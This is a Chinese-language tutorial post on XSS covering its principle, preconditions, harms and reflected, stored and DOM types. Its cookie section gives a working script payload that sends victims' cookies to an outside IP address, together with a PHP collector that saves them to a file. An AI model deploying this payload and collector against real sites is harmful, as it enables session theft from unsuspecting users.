首页 > 其他分享 >xss漏洞

xss漏洞

时间:2024-05-08 11:35:16浏览次数:20  
标签:xss dom 代码 用户 漏洞 cookie XSS

xss 漏洞的介绍:

原理 sql 注入的本质是什么?就是把用户输入的数据不是正常的数据而是sql代码,然后被执行,Xss漏洞 的原理其实就是前端写的有毛病,你能够自定义的去嵌入js代码让他去执行,讲的再明白一点就是,服务 端把用户输入的数据当成前端代码去执行了

 

 

利用条件:

  1. 用户输入的数据可控
  2. 原本程序要执行的代码,拼接了用户输入的数据

 

危害 :

  • 盗取用户cookie(用的最多) 
  • 修改网页内容 
  • 网站挂马 
  • Xss蠕虫 

 

分类:

  1. 反射型xss: 反射型 XSS 又称之为非持久型 XSS,黑客需要通过诱使用户点击包含 XSS 攻击代码的恶意链接, 然,后用户浏览器执行恶意代码触发 XSS 漏洞。
  2. 存储型xss: 存储型xss会把用户输入的数据存储在服务器端,这种xss可以持久化,而且更加的稳定比如黑客写 了一篇包含xss恶意代码的博客文章,那么访问该博客的所有用户他们的浏览器中都会执行黑客构造的xss 恶意代码,通常这种攻击代码会以文本或数据库的方式保存在服务器端,所以称为存储型xss
  3. dom型xss: 我们可以通过js代码去操纵所有的dom节点,那么dom型xss可以在前端通过js来完成数据的交 互,达到插入数据造成xss脚本攻击,直接通过修改页面的dom节点形成xss,且不经过服务器, 所以即使抓包无法抓取到这里的流量,而反射型与存储型xss需要与服务器交互,dom型xss也是 一种反射型的xss

 

Cookie 的获取及利用:

<script>document.write('<img src="http://111.229.218.169/cookie.php?cookie='+document.cookie+'">');</script>

 

这 段代码的目的就是将当前用户浏览器中的 cookie 值发送到远程服务器 http://111.229.218.169/cookie.php Cookie.php 里写着

<?php
 $cookie=$_GET['cookie'];
 file_put_contents('cookie.txt',$cookie);
?>
<script>location.href="http://111.229.218.169/cookie.php?cookie="+document.cookie</script>

chown www-data. cookie.txt 给 cookie.txt 写入的权限

标签:xss,dom,代码,用户,漏洞,cookie,XSS
From: https://www.cnblogs.com/lovexiaoxingxing/p/18179335

相关文章

  • buuctf-pwn-[第五空间2019 决赛]PWN5-格式化字符串漏洞
    题目地址:https://buuoj.cn/challenges#[第五空间2019决赛]PWN5先检查一下保护情况再拖进ida里分析找到一个格式化字符串漏洞,那么我们可以利用这个漏洞去获取或者改写dword_804C044的值从而进入if语句中,拿到shell什么是格式化字符串漏洞所谓格式化字符串漏洞,就是我们能控......
  • Fastjson反序列化漏洞
    目录漏洞原理复现Fastjson1.2.24Fastjson1.2.47漏洞分析Fastjson是阿里巴巴开源的一个Java库,用于将Java对象转换为JSON字符串(序列化),以及将JSON字符串转换为Java对象(反序列化),漏洞编号CVE-2017-18349。漏洞原理Fastjson引入了autoType功能,允许在反序列化过程中通过@type......
  • 《安富莱嵌入式周报》第336期:开源计算器,交流欧姆表,高性能开源BLDC控制器,Matlab2024a,操
    周报汇总地址:http://www.armbbs.cn/forum.php?mod=forumdisplay&fid=12&filter=typeid&typeid=104 本周更新一期视频教程:BSP视频教程第30期:UDSISO14229统一诊断服务CAN总线专题,常用诊断执行流程精讲,干货分享,图文并茂https://www.armbbs.cn/forum.php?mod=viewthread&tid=12......
  • Nftables漏洞原理分析(CVE-2022-32250)
    前言在nftales中存在着集合(sets),用于存储唯一值的集合。sets 提供了高效地检查一个元素是否存在于集合中的机制,它可以用于各种网络过滤和转发规则。而CVE-2022-32250漏洞则是由于nftables在处理set时存在uaf的漏洞。环境搭建ubuntu20+QEMU-4.2.1+Linux-5.15.config文件......
  • 【 攻防实操系列+漏洞复现 】-- Jinja2 SSTI模板注入
    框架:python---Flask描述:Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2漏洞复现:Jinja2SSTI模板注入使用vulhub靶场,启动环境先进入容器看一下web服务的代码,得出参数值为name,且可控判断是否存在ssti漏洞,输入:?name={{1*9}},......
  • Apache Log4j2远程命令执行漏洞
    目录漏洞原理复现反弹shell漏洞修复AApacheLog4j2是一个基于Java的日志记录工具,被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。Log4j2远程代码执行漏洞编号CVE-2021-44228。漏洞原理漏洞主要由于Log4j2在处理程序日志记录时存在JNDI入......
  • Apache Shiro 721反序列化漏洞Padding Oracle Attack
    目录漏洞原理复现修复方式漏洞原理Shiro的RememberMeCookie使用的是AES-128-CBC模式加密。其中128表示密钥长度为128位,CBC代表CipherBlockChaining,这种AES算法模式的主要特点是将明文分成固定长度的块,然后利用前一个块的密文对当前块的明文进行加密处理。这种模式的加......
  • Apache Shiro 550反序列化漏洞
    目录漏洞原理复现漏洞探测方式一ysoserial反弹shell方式二ShiroAttack2一键利用修复措施ApacheShiro是一个用于身份验证、授权、加密和会话管理的Java安全框架。ApacheShiro550是个反序列化漏洞,漏洞编号为CVE-2016-4437。漏洞原理Shiro框架提供了一个RememberMe功能,允许......
  • Nexpose v6.6.248 for Linux & Windows - 漏洞扫描
    Nexposev6.6.248forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseApr24,2024请访问原文链接:Nexposev6.6.248forLinux&Windows-漏洞扫描,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时......
  • Web漏洞扫描器-Xray
    下载地址:https://github.com/chaitin/xray/releases使用环境:Windows、Linux、macOS皆可工具说明:Xray扫描器是一款功能强大的安全评估工具。支持主动、被动多种扫描方式,支持常见Web漏洞的自动化检测,可以灵活定义POC,功能丰富,调用简单,支持多种操作系统。官方使用文档:https://docs......